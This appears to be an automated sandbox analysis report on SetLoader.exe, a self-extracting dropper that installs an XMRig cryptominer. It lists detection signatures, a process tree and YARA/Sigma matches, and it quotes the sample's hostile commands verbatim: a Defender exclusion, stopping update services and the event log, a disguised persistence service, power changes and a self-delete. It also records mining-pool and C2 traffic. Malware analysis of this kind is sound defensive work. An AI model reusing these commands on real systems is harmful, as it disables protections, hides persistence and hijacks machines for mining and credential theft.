
Windows Analysis Report
SetLoader.exe

Overview

General Information

Sample name: SetLoader.exe
Analysis ID: 1498675
MD5: 68adcb0c0e4419351ae5371732ea78dd
SHA1: 66817456a9339399d01b37ebb59bca59cbc7ec7d
SHA256: 695cb5d1f8e58dc1c894791b70adc5bd1b0401e6e0fcf55a82637796ec236d84
Tags: exe

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
DNS related to crypt mining pools
Drops large PE files
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
PE file contains section with special chars
Protects its processes via BreakOnTermination flag
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Uses powercfg.exe to modify the power settings
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • SetLoader.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\SetLoader.exe" MD5: 68ADCB0C0E4419351AE5371732EA78DD)
    • w1.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w1.exe" MD5: 739213A2496D01E16DDC02B6898A81AD)
    • w2.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" MD5: FCE277E4928FDE19CD8BAD5CE1997792)
      • powershell.exe (PID: 2860 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6480 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • wusa.exe (PID: 6072 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
      • sc.exe (PID: 6900 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 7116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1508 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1904 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1544 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 1620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 1716 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 3408 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 3964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4112 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 4164 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powercfg.exe (PID: 1104 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
        • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4020 cmdline: C:\Windows\system32\sc.exe delete "PcHealthTool" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 3444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 4420 cmdline: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 5004 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • sc.exe (PID: 3872 cmdline: C:\Windows\system32\sc.exe start "PcHealthTool" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • conhost.exe (PID: 6112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3020 cmdline: C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • choice.exe (PID: 2784 cmdline: choice /C Y /N /D Y /T 3 MD5: 1A9804F0C374283B094E9E55DC5EE128)
    • w3.exe (PID: 5328 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe" MD5: 286405D179DCBBC1ACB0B5957B45CDF7)
  • HealthTool.exe (PID: 5628 cmdline: C:\ProgramData\PcHealthTool\HealthTool.exe MD5: FCE277E4928FDE19CD8BAD5CE1997792)
    • powershell.exe (PID: 4192 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 6928 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 6640 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6936 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7084 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 3736 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 884 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6152 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 1816 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 6064 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 4632 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 6444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • dwm.exe (PID: 6072 cmdline: dwm.exe MD5: 5C27608411832C5B39BA04E33D53536C)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source: 00000044.00000002.2958991562.000001F3D6BC4000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000044.00000003.2855013595.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000044.00000002.2958991562.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown, Strings:
  • 0x10c08:$a1: mining.set_target
  • 0x2e30:$a2: XMRIG_HOSTNAME
  • 0x57a8:$a3: Usage: xmrig [OPTIONS]
  • 0x2e08:$a4: XMRIG_VERSION
Source: 42.3.HealthTool.exe.900000.2.raw.unpack, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security
Source: 42.3.HealthTool.exe.900000.2.raw.unpack, Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Author: unknown, Strings:
  • 0x36fe08:$a1: mining.set_target
  • 0x362030:$a2: XMRIG_HOSTNAME
  • 0x3649a8:$a3: Usage: xmrig [OPTIONS]
  • 0x362008:$a4: XMRIG_VERSION
Source: 42.3.HealthTool.exe.900000.2.raw.unpack, Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Author: Florian Roth, Strings:
  • 0x3b5561:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
Source: 42.3.HealthTool.exe.900000.2.raw.unpack, Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Author: ditekSHen, Strings:
  • 0x3b5dd8:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3b9400:$s3: \\.\WinRing0_
  • 0x366fa8:$s4: pool_wallet
  • 0x3613d8:$s5: cryptonight
  • 0x3613e8:$s5: cryptonight
  • 0x3613f8:$s5: cryptonight
  • 0x361408:$s5: cryptonight
  • 0x361420:$s5: cryptonight
  • 0x361430:$s5: cryptonight
  • 0x361440:$s5: cryptonight
  • 0x361458:$s5: cryptonight
  • 0x361468:$s5: cryptonight
  • 0x361480:$s5: cryptonight
  • 0x361498:$s5: cryptonight
  • 0x3614a8:$s5: cryptonight
  • 0x3614b8:$s5: cryptonight
  • 0x3614c8:$s5: cryptonight
  • 0x3614e0:$s5: cryptonight
  • 0x3614f8:$s5: cryptonight
  • 0x361508:$s5: cryptonight
  • 0x361518:$s5: cryptonight
Source: 42.3.HealthTool.exe.900000.2.unpack, Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Author: Joe Security

Change of critical system settings

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 3408, ProcessName: powercfg.exe

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\w3.exe, ProcessId: 5328, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2860, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2860, ProcessName: powershell.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community, Data: Command: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "PcHealthTool" binpath= "C:\ProgramData\PcHealthTool\HealthTool.exe" start= "auto", ProcessId: 4420, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 2860, ProcessName: powershell.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started, Author: Joe Security, Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\w2.exe, ParentProcessId: 6104, ParentProcessName: w2.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 5004, ProcessName: sc.exe
No Suricata rule has matched

AV Detection

Source: C:\Users\user\AppData\Roaming\Microsoft\WmiPrvSE.exe, Avira: detection malicious, Label: TR/Crypt.OPACK.Gen
Source: SetLoader.exe, Virustotal: Detection: 18%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Source: Yara match, File source: 42.3.HealthTool.exe.900000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 42.3.HealthTool.exe.900000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 68.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000044.00000002.2958991562.000001F3D6BC4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000044.00000003.2855013595.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000044.00000002.2958991562.000001F3D6BDF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000044.00000002.2948829488.0000000140360000.00000002.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000044.00000002.2958991562.000001F3D6B89000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000044.00000002.2958991562.000001F3D6C5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: HealthTool.exe PID: 5628, type: MEMORYSTR
Source: unknown, DNS query: name: xmr-eu1.nanopool.org
Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: cryptonight/0
Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: -o, --url=URL URL of mining server
Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: stratum+tcp://
Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: HealthTool.exe, 0000002A.00000003.2854736000.0000000000900000.00000004.00000001.00020000.00000000.sdmp, String found in binary or memory: Usage: xmrig [OPTIONS]
Source: SetLoader.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 172.67.195.146:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: SetLoader.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: SetLoader.exe, SetLoader.exe, 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp, SetLoader.exe, 00000000.00000000.1696717128.0000000000646000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.ini source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbern.default source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP source: w1.exe, 00000004.00000002.2314431379.00000000048FA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: HealthTool.exe, 0000002A.00000003.2852954825.00000000001E0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatory source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\profiles.iniCDBE0A5831 source: w1.exe, 00000004.00000002.2313531816.0000000003B6A000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb831r source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbAcrobatiner source: w1.exe, 00000004.00000002.2313531816.0000000003B47000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\SetLoader.exe, Code function: 0_2_0061C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0061C4A8
Source: C:\Users\user\Desktop\SetLoader.exe, Code function: 0_2_0062E560 SendDlgItemMessageW,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0062E560
Source: global traffic, TCP traffic: 192.168.2.4:49745 -> 146.59.154.106:10343
Source: Joe Sandbox View, JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic, HTTP traffic detected:
  POST /728630130?dra3rui9q=Xolu04GlIQLFjJFM6JZq%2BP4g7%2B4X7P%2FHrtsOFruNHcz8roZ2mb8hM%2FxVkw2cnjmbA9ieTeixK0RNwaAeQEPn7Q%3D%3D HTTP/1.1
  Connection: Keep-Alive
  Accept: */*
